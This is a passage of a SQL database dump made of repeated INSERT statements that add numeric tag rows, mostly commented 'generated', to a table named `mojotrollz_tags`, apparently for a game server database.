(15903, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15904, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15905, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15905, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15906, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15906, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15907, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15907, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15908, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15908, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15909, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15909, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15910, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15911, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15912, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15913, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15914, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15915, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15916, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15917, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15918, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15922, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15928, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15928, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15928, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15929, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15929, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15929, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15930, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15930, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15930, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15931, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15931, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15931, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15932, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15932, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15932, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15933, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15934, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15934, 1, 2, 3454, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15934, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15936, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15936, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15936, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15952, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15952, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15952, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15953, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15953, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15953, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15954, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15954, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15954, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15956, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15956, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15956, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15957, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15957, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15957, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15961, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15961, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15962, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15962, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15962, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15963, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15963, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15963, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15964, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15972, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15973, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15974, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15974, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15974, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15975, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15975, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15975, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15976, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15976, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15976, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15977, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15977, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15977, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15978, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15978, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15978, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15979, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15979, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15979, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15980, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15980, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15980, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15981, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15981, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15981, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15984, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15984, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15984, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15989, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15990, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15990, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15990, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16001, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16001, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16002, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16002, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16003, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16003, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16004, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16004, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16005, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16005, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16006, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16007, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16007, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16008, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16008, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16009, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16009, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16011, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16011, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16011, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16012, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16012, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16012, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16012, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16012, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16012, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16013, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16013, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16014, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16014, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16015, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16015, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16016, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16016, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16017, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16017, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16017, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16018, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16018, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16018, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16020, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16020, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16020, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16021, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16021, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16021, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16022, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16022, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16022, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16024, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16024, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16024, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16025, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16025, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16025, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16027, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16027, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16027, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16028, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16028, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16028, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16029, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16029, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16029, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16030, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16030, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16030, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16031, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16032, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16032, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16032, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16033, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16033, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16034, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16034, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16034, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16036, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16036, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16036, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16037, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16037, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16037, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16042, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16043, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16043, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16044, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16044, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16044, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16045, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16045, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16045, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16046, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16046, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16046, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16047, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16047, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16048, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16048, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16048, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16049, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16050, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16051, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16052, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16053, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16054, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16055, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16056, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16056, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16056, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16057, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16057, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16057, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16058, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16059, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16060, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16060, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16060, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16061, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16061, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16061, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16062, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16062, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16062, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16063, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16063, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16063, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16064, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16064, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16064, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16065, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16065, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16065, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16066, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16067, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16067, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16067, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16068, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16068, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES 